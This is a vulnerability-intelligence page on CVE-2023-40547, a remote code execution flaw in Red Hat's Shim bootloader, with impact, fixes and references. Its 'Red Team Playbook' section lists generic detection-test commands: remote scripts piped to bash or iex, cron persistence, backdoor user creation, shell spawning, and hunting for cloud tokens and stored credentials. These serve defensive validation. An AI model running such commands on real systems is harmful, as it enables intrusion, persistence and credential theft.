CVE-2023-40547
Overview
This vulnerability is an out-of-bounds write occurring within the Shim bootloader component, specifically during parsing of HTTP responses. The root cause lies in Shim's improper validation of attacker-controlled values in HTTP response data, leading to memory corruption. The flaw affects the early boot phase of Red Hat Enterprise Linux systems utilizing Shim for secure boot support.
Vulnerability Description
A remote code execution vulnerability was found in Shim. The Shim boot support trusts attacker-controlled values when parsing an HTTP response. This flaw allows an attacker to craft a specific malicious HTTP request, leading to a completely controlled out-of-bounds write primitive and complete system compromise. This flaw is only exploitable during the early boot phase, an attacker needs to perform a Man-in-the-Middle or compromise the boot server to be able to exploit this vulnerability successfully.
Impact
An attacker with network access to the boot process can execute arbitrary code with system-level privileges during early boot by exploiting this vulnerability. Successful exploitation requires either a Man-in-the-Middle position or control over the boot server to deliver malicious HTTP responses. This leads to complete system compromise, including unauthorized code execution and potential persistent control over the affected system. The CVSS vector indicates attack complexity is high and privileges are not required, but network access to the boot communication channel is mandatory.
Solution
Red Hat has released security advisories RHSA-2024:1834, RHSA-2024:1835, RHSA-2024:1873, RHSA-2024:1876, and RHSA-2024:1883 addressing this issue in Red Hat Enterprise Linux versions 7, 8, and 9. Users should apply the corresponding Shim package updates as detailed in these advisories. For complete patch instructions and version details, refer to the official Red Hat errata pages at https://access.redhat.com/errata/. No alternative workarounds are documented.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A significant vulnerability has been identified within the Shim boot support, which is critical for the secure boot process in various Red Hat Enterprise Linux distributions. This flaw arises from the system's trust in attacker-controlled values during the parsing of HTTP responses. Specifically, the vulnerability allows an attacker to craft a malicious HTTP request that can lead to an out-of-bounds write condition. This condition can be exploited to execute arbitrary code, effectively granting the attacker complete control over the affected system. The exploitation of this vulnerability is particularly concerning because it occurs during the early boot phase, a time when the system is highly vulnerable and lacks many of the security protections that are typically in place during normal operation.
The primary attack vectors for this vulnerability include Man-in-the-Middle (MitM) attacks or compromising the boot server. An attacker could intercept the communication between the boot process and the server, injecting malicious payloads into the HTTP responses. Alternatively, if an attacker gains control over the boot server itself, they could serve malicious responses directly to any system attempting to boot. This makes the vulnerability especially dangerous in environments where secure boot processes are not adequately protected, as it allows for a complete system compromise before the operating system has fully initialized its security mechanisms.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Red Hat Enterprise Linux for critical operations. A successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential financial losses. The ability to execute arbitrary code during the boot phase means that attackers could install persistent malware, establish backdoors, or manipulate system configurations to maintain control over the compromised systems. The business risks associated with such an incident include reputational damage, regulatory penalties, and the costs associated with incident response and recovery efforts.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. First, ensuring the integrity of the boot server and the communication channels used during the boot process is essential. This can be achieved through the use of secure protocols, such as HTTPS, and by employing strong authentication mechanisms to prevent unauthorized access. Additionally, organizations should regularly monitor their systems for unusual behavior during the boot process and maintain up-to-date security patches provided by Red Hat. Implementing network segmentation can also help limit the exposure of critical systems to potential MitM attacks.
In conclusion, the vulnerability within Shim boot support poses a significant threat to the security of systems running Red Hat Enterprise Linux. The potential for remote code execution during the early boot phase, combined with the necessary conditions for exploitation, underscores the importance of robust security practices in safeguarding against such attacks. Organizations must remain vigilant and proactive in their security measures to mitigate the risks associated with this and similar vulnerabilities, ensuring that their systems remain secure from emerging threats.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2023-40547, with new indications of attempted exploitation emerging in the wild. Although the overall EPSS score shows a slight decline, the recent uptick in telemetry suggests adversaries are increasingly probing environments running Red Hat Enterprise Linux 7 for opportunities to leverage this vulnerability. This shift is significant because it reflects a growing operational interest in exploiting the Shim boot support flaw despite the challenging conditions required for successful attacks, such as the need for Man-in-the-Middle positioning or boot server compromise. The increase in detection activity, albeit limited, signals that threat actors may be refining their tactics or testing exploit reliability, which could presage more frequent or sophisticated attempts. Consequently, the risk posture for affected organizations should be considered elevated, warranting heightened vigilance in monitoring early boot processes and network traffic that could facilitate such exploitation.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Redhat | Shim | All |
cpe:2.3:a:redhat:shim:*:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux | 7.0 |
cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux | 8.0 |
cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux | 9.0 |
cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
2 eventsSighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (14)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-40547 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:1834 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:1835 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:1873 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:1876 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:1883 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:1902 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:1903 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:1959 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:2086 |
| access.redhat.com |
GitHub CVE
vdb-entry
x_refsource_REDHAT
|
https://access.redhat.com/security/cve/CVE-2023-40547 |
| bugzilla.redhat.com |
GitHub CVE
issue-tracking
x_refsource_REDHAT
|
https://bugzilla.redhat.com/show_bug.cgi?id=2234589 |
| openwall.com |
NVD API
|
http://www.openwall.com/lists/oss-security/2024/01/26/1 |
| lists.debian.org |
NVD API
|
https://lists.debian.org/debian-lts-announce/2024/05/msg00009.html |